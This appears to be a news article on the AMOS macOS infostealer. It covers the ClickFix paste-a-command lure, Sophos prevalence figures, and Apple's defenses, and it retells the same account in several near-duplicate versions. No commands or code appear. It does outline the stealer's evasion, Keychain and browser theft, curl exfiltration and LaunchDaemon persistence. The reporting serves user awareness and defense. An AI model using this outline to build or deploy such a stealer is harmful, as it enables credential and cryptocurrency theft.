No platform is immune to users who ignore basic security warnings
A piece of malware called AMOS has risen to prominence not by breaking Apple's defenses, but by persuading people to break them on its behalf. Through a deceptively simple social engineering ruse, it convinces macOS users to paste a single terminal command — and from that moment of misplaced trust, it quietly harvests passwords, credentials, and cryptocurrency assets. That AMOS now accounts for nearly 40 percent of macOS threat responses in 2025 is less a story about software vulnerability than about the enduring fragility of human judgment in the face of convincing deception.
- AMOS doesn't exploit Apple's code — it exploits human compliance, tricking users into typing a single terminal command that hands attackers the keys to their digital lives.
- Once inside, the malware moves with alarming efficiency: capturing the system password, bypassing security warnings, draining the Keychain, stripping browser credentials, and even deploying fake crypto wallets to steal seed phrases.
- The infection has spread through poisoned search results tied to ChatGPT and Grok queries, meaning ordinary curiosity has become a viable attack vector for unsuspecting users.
- AMOS now accounts for nearly 40 percent of all macOS protection updates deployed by Sophos in 2025 — more than double any competing macOS threat — signaling a shift in the threat landscape toward manipulation over exploitation.
- Security researchers are divided: some warn of a genuine epidemic, while others argue Apple's improving Gatekeeper and XProtect systems may soon neutralize AMOS entirely, leaving user awareness as the only meaningful battleground.
A malware family known as AMOS — short for Atomic macOS Stealer — has emerged as one of the most prevalent threats to Apple users, not by finding cracks in macOS itself, but by convincing people to open the door willingly. Using a ClickFix-style social engineering technique, it persuades victims to paste a single line of code into their Terminal. From there, the malware requests the user's system password, validates it locally, and begins a methodical harvest: Keychain passwords, Firefox and Chrome credentials, browser extension data, session tokens, and in some variants, fake cryptocurrency wallet apps designed to steal seed phrases.
The scale of the problem has drawn serious attention. Sophos MDR teams found that AMOS accounted for nearly 40 percent of all macOS protection updates deployed throughout 2025 — more than double the rate of any other macOS malware family. In just the final three months of that period, nearly half of all macOS stealer reports from Sophos customers involved AMOS or close variants. The malware-as-a-service operation has been active since at least April 2023, with campaigns spreading through poisoned search results tied to ChatGPT and Grok queries — a vector that weaponizes ordinary curiosity.
Technically, AMOS is disciplined. It checks for virtual machine environments to evade researchers, compresses stolen data using the native ditto utility, and transmits everything to attacker-controlled servers via curl. To survive reboots, it installs a LaunchDaemon that ensures persistent access long after the initial infection.
Yet not everyone agrees the alarm is proportionate. Critics note that infostealers have plagued Windows systems for two decades, and that AMOS carries a fundamental weakness: it requires the user's active participation. Apple's continued improvements to Gatekeeper, XProtect, and notarization may soon make the malware obsolete. The deeper question the industry is wrestling with is whether AMOS represents a novel threat or simply a fresh reminder that user behavior — not software architecture — remains the most exploitable vulnerability of all.
A malware family called AMOS has become one of the most prevalent threats to macOS users, not because it exploits hidden flaws in Apple's operating system, but because it tricks people into running commands they shouldn't. The malware, also known as Atomic macOS Stealer, relies entirely on social engineering—a ClickFix-style ruse that convinces victims to paste a single line of code into their Terminal application. Once executed, the damage unfolds methodically: the malware asks for the user's system password, validates it locally, and stores it in a hidden file. From there, it downloads additional payloads designed to bypass macOS security warnings and begins harvesting everything of value—passwords from the Keychain, credentials from Firefox and Chrome, browser extension data, and session tokens. Some variants even deploy fake cryptocurrency wallet applications to steal seeds and login information.
The scale of AMOS infections has caught the attention of security researchers and vendors alike. Sophos MDR teams identified the ClickFix pattern in a recent incident and found that AMOS accounted for nearly 40 percent of all macOS protection updates the company deployed throughout 2025, more than double the detection rate of any other macOS malware family during that period. In the last three months alone, almost half of all macOS stealer reports from Sophos customers involved AMOS or closely related variants. The malware-as-a-service operation has been tracked since at least April 2023, with notable campaigns including a variant called SHAMOS that CrowdStrike documented in August 2025. In December 2025, Huntress researchers found infections spreading through poisoned search results related to ChatGPT and Grok conversations—a particularly insidious vector because users were simply looking for information.
Once the initial command executes and the password is captured, AMOS moves quickly to establish control. The malware checks whether it is running inside a virtual machine or sandbox by querying system profiler data for signs of QEMU, VMware, or KVM—a defensive measure that helps it avoid security researchers. It then proceeds to extract the macOS Keychain database, which contains passwords for countless accounts and services. Browser credentials from Firefox and Chrome are harvested next, along with extension storage files and local session tokens. All of this data is compressed into a single archive using the ditto utility and transmitted to attacker-controlled servers via curl POST requests. To ensure it survives a system restart, AMOS installs a LaunchDaemon that automatically executes the malware after every reboot, giving attackers persistent access to the compromised machine.
Yet security experts are divided on whether the threat level warrants the alarm. Some argue that vendors may be overstating AMOS's novelty, pointing out that infostealers have been targeting Windows systems for nearly two decades. The malware's fundamental weakness is also hard to ignore: it requires user consent. Someone must willingly paste and run a Terminal command, which creates a significant barrier that technically literate users might easily avoid. Apple, meanwhile, is not sitting idle. The company's ongoing improvements to Gatekeeper, XProtect, and notarization requirements could render AMOS largely ineffective within a few operating system updates. The real vulnerability, some researchers suggest, may not be in AMOS itself but in the uncomfortable reality that no platform is immune to users who ignore basic security warnings. The question facing the industry is whether the threat is genuinely unprecedented or simply a reminder that user behavior remains the weakest link in any security chain.
Notable Quotes
The real danger may lie less in AMOS itself and more in the uncomfortable truth that no platform is immune to users who ignore basic security warnings.— Security researchers and analysts cited in the investigation
The Hearth Conversation Another angle on the story
Why does AMOS work so well if it requires users to manually run commands? That seems like it should be easy to avoid.
It should be, in theory. But the social engineering is sophisticated. Someone sees a message about updating their system or fixing a problem, and they're told to paste a command. They trust the source, or they're in a hurry, or they don't understand what the command does. By the time they realize something is wrong, the malware already has their password.
Once it has the password, what can't it access?
Essentially everything. The Keychain holds passwords for email, banking, work systems. Browser credentials give access to social media, cloud storage, financial accounts. If someone uses cryptocurrency, the fake wallet apps steal the seed phrases—those are irreplaceable. The attacker now owns the victim's digital life.
Is Apple doing anything about this?
Yes. Gatekeeper and XProtect are getting stronger with each update. Notarization requirements make it harder to distribute malware. But those are technical defenses. They don't stop someone from running a command they were tricked into running.
So the real problem is user behavior?
It always has been. AMOS is just the current reminder of that. You can build the most secure system in the world, but if someone willingly hands over the keys, it doesn't matter.